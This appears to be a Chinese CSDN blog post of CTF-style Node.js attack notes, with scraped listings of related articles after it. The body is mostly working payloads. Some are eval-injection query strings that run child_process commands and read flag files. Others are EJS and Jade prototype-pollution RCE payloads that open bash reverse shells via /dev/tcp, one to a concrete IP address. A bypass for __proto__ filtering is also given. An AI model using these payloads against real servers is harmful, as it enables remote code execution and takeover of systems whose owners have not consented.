Nodejs笔记

最新推荐文章于 2024-12-25 20:51:47 发布
最新推荐文章于 2024-12-25 20:51:47 发布
阅读量589 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33814823/article/details/130867306
版权
文章介绍了Node.js中使用child_process模块进行命令执行的方法,如execSync、spawnSync,以及文件操作如readdirSync和readFileSync。同时,提到了EJS和Jade模板引擎的RCE漏洞利用payload,并讨论了如何绕过可能的过滤机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Nodejs笔记

一、命令执行

?eval=require('child_process').execSync('ls').toString();
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).output;
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout;
?eval=global.process.mainModule.constructor._load('child_process').exec('ls');
//文件操作
?eval=require('fs').readdirSync('.');
?eval=require('fs').readFileSync('fl001g.txt')

ejs引擎RCE payload

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"');var __tmp2"}}

jade rce payload

{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2333 0>&1\"')"}}}

nodejs 会把同名参数以数组的形式存储,并且 JSON.parse 可以正常解析34b26e479ce54df79f007fba54123da8

__proto__过滤:用constructor.prototype.outputFunctionName代替

otype.outputFunctionName`代替

ttycp3
关注
node-eval:直接评估节点require()模块的内容
05-09
评估-模块内容的require()! 概述 该模块是一种与require()相同的评估模块内容的简单方法,但无需从文件中加载它。 实际上,它模仿了javascript邪恶的eval函数,但改用了Node的VM模块。 好处 您为什么要在本机require使用eval模块? 在大多数情况下, require是可以的,但在某些情况下,我发现自己希望做到以下几点: 能够为模块提供上下文 能够从非节点标准位置加载模块文件 或者只是简单地利用JavaScript的eval但可以使用沙箱。 下载 它在节点程序包管理器(npm)上发布。 要安装,请执行以下操作: npm install eval 用法 var _eval = require ( 'eval' ) var res = _eval ( content /*, filename, scope, includeGlobals */ ) 提供
黑马web 39期 nodejs笔记
03-17
### 黑马web 39期 Node.js笔记 #### NVM 安装与管理 - **NVM**(Node Version Manager)是一个用于管理多个Node.js版本的工具,它可以帮助开发者轻松地在不同的项目中切换所需的Node.js版本。 - **安装**: NVM 的 ...
CTFSHOW-nodejs
m0_74456293的博客
04-17 671
CTFSHOW-nodejs
NodeJS环境变量
wujinhong2008的博客
07-14 109
一、Read–Eval–Print Loop(REPL)交互式解释器 二、npm root -g //获取全局模块默认安装位置,即全局模块默认安装位置前缀/lib/node_modules; 三、 设置安装位置 (运行环境目录在第六点)npm config set prefix "/node_global" //设置全局模块默认安装位置前缀;也可以直接修改:$HOME/.npm...
如何使用EJS
thlzjfefe的博客
09-12 545
最近做的一个新项目,所以想着换一个新的模版引擎尝试一下。(之前我们一直在使用handlebars) 本次源码分析所使用的是TJ大神开发的1.x版本 当然现在该项目已经停止维护了,目前正在维护的是2.x版本 什么是EJS EJS是一个JavaScript模版库,用来将EJS模版结合着JSON数据转换为HTML 并且可以直接在模版中写JavaScript的语法 简单的示例 let template = '<h1>Hello, <%= name %></h1>' .
ejs默认配置 原型链污染
rev1ve的博客
01-06 1357
我们已经知道当编译模板时,它会使用多个配置元素来处理模板中的代码片段,并将其转换为可执行的 JavaScript 函数。不过其中大多数都使用。因此,对于用户提供的对象来说情况并非如此,从 EJS 维护者的角度来看,用户向库提供的输入不是 EJS 的责任。所有这些都发生在最终被调用的 Template 类的编译函数中,在这种情况下,当创建模板对象时,将使用受感染的选项。路由下,接收GET参数并赋值给data变量,然后黑名单检测,调用ejs模板进行渲染其中解析data的json数据,说明ejs配置可控。
NodeJs笔记
10-23
### Node.js与Linux基础知识及Angular CLI安装指南 #### 一、Node.js简介 Node.js是一种开源、跨平台的JavaScript运行时环境,它基于Chrome V8 ...希望这篇笔记能够帮助到需要的朋友,也欢迎大家提出宝贵意见和建议。
nodejs笔记
最新发布
03-27
### Node.js 学习笔记与教程 #### 初识 Node.js 和其核心概念 Node.js 是一种基于 Chrome V8 引擎构建的 JavaScript 运行环境,允许开发者使用 JavaScript 创建高性能服务器端应用程序。它通过事件驱动 I/O 模型...
nodejs_notes:我的 nodejs 笔记
06-15
《Node.js笔记:深入探索JavaScript后端开发》 Node.js,作为JavaScript在服务器端的运行环境,自2009年发布以来,以其高效的非阻塞I/O模型、丰富的生态系统和跨平台特性,逐渐成为开发者青睐的Web开发工具。本笔记...
Nodejs学习笔记.rar
07-25
Node.js是一种基于Chrome V8引擎的JavaScript运行环境,它允许开发者使用JavaScript进行服务器端..."Nodejs学习笔记"这个压缩文件应当包含了解析这些概念和技能的详细内容,帮助初学者或进阶者提升Node.js技术能力。
js的eval函数
xiaohua0708day的博客
12-25 899
eval() 是 JavaScript 中的一个内置函数,用于将传入的字符串当作 JavaScript 代码执行。
实现一个简单的服务自动重启
YancyCathy的博客
09-30 435
今天跟大家分享一个好用的技能 – 监听文件变化,自动重启服务 很多时候我们都会用到 webpack 中带的热更新插件来实现这个功能,接下来我们就来看下如何使用 node 原生的 api 来实现。 此法不一定适用于所有项目 ,需要根据实际项目来自行选择。 首先我们来看下需要用到的 模块和api 1. 需要用到的模块 fs 毫无疑问,想要监听文件变化,此模块是必不可少的。 path 此模块可以说跟 fs 狼狈为奸,我们可以使用此模块来获得任何我们想要的路径。 child_process 此模块可
Nodejs异步编程一——发布/订阅
eval的博客
02-24 1495
我们刚开始学习nodejs时难免会写出这样的代码,一旦嵌套过深,代码将变得很难维护var fs = require("fs") var path = require("path")// 原始函数 fs.readdir(path.normalize('/test'), function(err, files){ files.forEach(function(filename, index){
eval() python_Boa: 在 Node.js 中使用 Python
weixin_39855186的博客
11-25 170
作者 | Yorkie这次主要给大家带来一个好东西,它的主要用途就是能让大家在 Node.js 中使用 Python 的接口和函数。可能你看到这里会好奇,会疑惑,会不解,我 Node.js 大法那么好,干嘛要用 Python 呢?如果你之前尝试了解过一些机器学习的 JavaScript 的应用,就会比较清楚这背后的原因。现状是机器学习生态几乎是捆绑在 Python 这门语言在高速迭代着的...
Js 代替eval的方法
热门推荐
猿来这样-谢厂节的博客
09-01 1万+
function eval1 (str) { var script = document.createElement('script'); script.type="text/javascript"; script.text=str; document.getElementsByTagName('head')[0].appendChild(script); d
动态执行脚本
李刚的学习专栏
04-12 2489
提到动态执行脚本,大家想到的肯定是 eval 或 new Function(),在 nodejs 中有专属的 vm 模块,可以完成相应的 sandbox 作用。 浏览器中动态执行脚本 eval() 函数会将传入的字符串当做 JavaScript 代码进行执行,返回字符串中代码的返回值;如果参数不是字符串将原封不动返回。 如果你间接的使用 eval(),比如通过一个引用来调用它,而不是直接的调用 e...
4.4 eval函数替代Function
LetsStudy的博客
02-21 607
文档地址:https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval let text = 'hello world' eval("!function x(){console.log(`${text}`)}()"); Function(!function x(){console.log(`${text}`)}() )() //上面两条语句的执行结果是一致的,eval不建议使用 ...
nodejs基础
weixin_43021174的博客
09-19 155
特点:单线程,非阻塞I/O,事件驱动 nodejs是一个js的执行环境 require表示引包,引包就是引用自己的一特殊功能 简单讲解http模块 const http = require('http'); http.createServer((req, res) =&amp;gt; { res.writeHead(200, { 'Content-Type': 'text/html;c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值